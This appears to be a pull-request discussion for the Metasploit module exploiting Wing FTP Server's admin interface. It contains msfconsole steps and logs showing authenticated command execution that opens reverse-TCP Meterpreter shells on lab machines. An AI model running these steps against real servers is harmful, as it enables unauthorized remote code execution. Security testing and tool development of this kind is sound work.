Improvements and documentation for wing_ftp_admin_exec

[ide0x90]

Notes

Improved the check method and added documentation. Also added a separate PowerShell target (see issue #10980) for in-memory execution.

If authentication is required for the exploit, we might as well go all the way, and do both the check and exploit using one authentication. Specific details about the installed Wing FTP Server version can only be obtained after authentication, so this makes it clear about what version of the vulnerable app we are exploiting.

As of 12/10/2018, The module has been further improved to get hard evidence about the existence of the vulnerability.

Vulnerable application

All versions of Wing FTP Server from 3.0.0 and up are vulnerable.

Upgraded module has been tested on a Windows Server 2016 Datacenter x64 with the following versions:

• Wing FTP Server 4.3.8
• Wing FTP Server 6.0.2

Original module has been tested on Windows 7 SP1 and Windows 8.1 with the following versions:

• Wing FTP Server 4.3.6
• Wing FTP Server 4.3.8

Verification Steps

• Start msfconsole
• use exploit/windows/ftp/wing_ftp_admin_exec
• set RHOST <target-ip>
• set USERNAME <valid-username>
• set PASSWORD <valid-password>
• exploit
• Verify that you get a shell

msf5 > use exploit/windows/ftp/wing_ftp_admin_exec 
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set RHOST 192.168.136.151
RHOST => 192.168.136.151
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set USERNAME admin
USERNAME => admin
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set PASSWORD password
PASSWORD => password
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.146:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 14bcf0bbb389113e879e5dcaa561f65f
[*] Found Wing FTP Server 6.0.2
[*] Executing payload via PowerShell...
[*] Powershell command length: 5995
[*] Sending stage (179779 bytes) to 192.168.136.151
[*] Meterpreter session 1 opened (192.168.136.146:4444 -> 192.168.136.151:4895) at 2018-12-10 20:54:51 +0800

meterpreter > sysinfo
Computer        : 2K16DTCTR
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

TODO

• Implement version check using Gem::Version
• Find some way to make CmdStager work with version 6.0.2

[busterb]

Jenkins test this please

[wchen-r7]

I have tested this module on:

• Wing FTP Server 6.0.3 on Windows 10
• Wing FTP Server 6.0.1 on Windows 10

In either powershell or command stager mode, the exploit doesn't seem to work. It does say the target is vulnerable though. Here's an example:

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[+] Authentication successful, got session cookie ca25df87f18f6497386425f0e0d80b03
[*] Found Wing FTP Server 6.0.1
[+] 172.16.249.129:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Authenticating...
[+] Authentication successful, got session cookie 6e77a346c47d7d17a7bbed1cbe60cf74
[*] Found Wing FTP Server 6.0.1
[*] Executing payload via PowerShell...
[*] Powershell command length: 5983
[-] Exploit aborted due to failure: unknown: 172.16.249.129:5466 - Something went wrong.
[*] Exploit completed, but no session was created.

By the way, I notice that the powershell path check is quite strict like this:

winenv_path.body.include?('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\')

However, my Windows 10 box's Windows directory name is actually WINDOWS. So I suggest you change the statement to a regex:

winenv_path.body.match(/C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\/i)

Please let me know what info you need so you can reproduce the problem. If possible, maybe provide a vulnerable application for testing just to be sure? Thank you!

[bcoles]

Is checking for 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\' the best way to determine whether PowerShell is present?

[ide0x90]

@wchen-r7 , I have attempted to make the PowerShell check less stringent based on your suggestions in commit 6d07979. I'm not sure that this is the cause of the failure, but before the latest commit I had remove_comspec set to true on the PowerShell command. Could that (setting remove_comspec to true) possibly be causing problems on your end? As for the vulnerable applications, I have installers for versions 4.3.8, 5.1.3, 6.0.1, 6.0.2 and 6.0.3. To where should I send these installers?

@bcoles , probably not. Fixed in commit 6d07979.

[wchen-r7]

Hey @Psi0NYX Thank you! I'll share a link with you on Google Drive you can upload your vuln apps there.

[wchen-r7]

@Psi0NYX I've shared a link with you to imrandawoodjee.infosec@gmail.com.

[h00die]

EDB has (most likely) 4.3.8 installer: https://www.exploit-db.com/exploits/34517

[wchen-r7]

Ok, works for me. Thank you for your patience and the apps @Psi0NYX. I'll land it now.

msf5 exploit(windows/ftp/wing_ftp_admin_exec) > check

[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[+] 172.16.249.130:5466 The target is vulnerable.
msf5 exploit(windows/ftp/wing_ftp_admin_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Found Wing FTP Server 4.3.8
[+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Executing payload via PowerShell...
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.130:49163) at 2019-03-05 12:40:49 -0600

meterpreter > 

[wchen-r7]

@h00die Nice find. Thank you.

[wchen-r7]

Release Notes

This adds new module documentation for the wing_ftp_admin_exec exploit module, as well as an improved check and support for Powershell.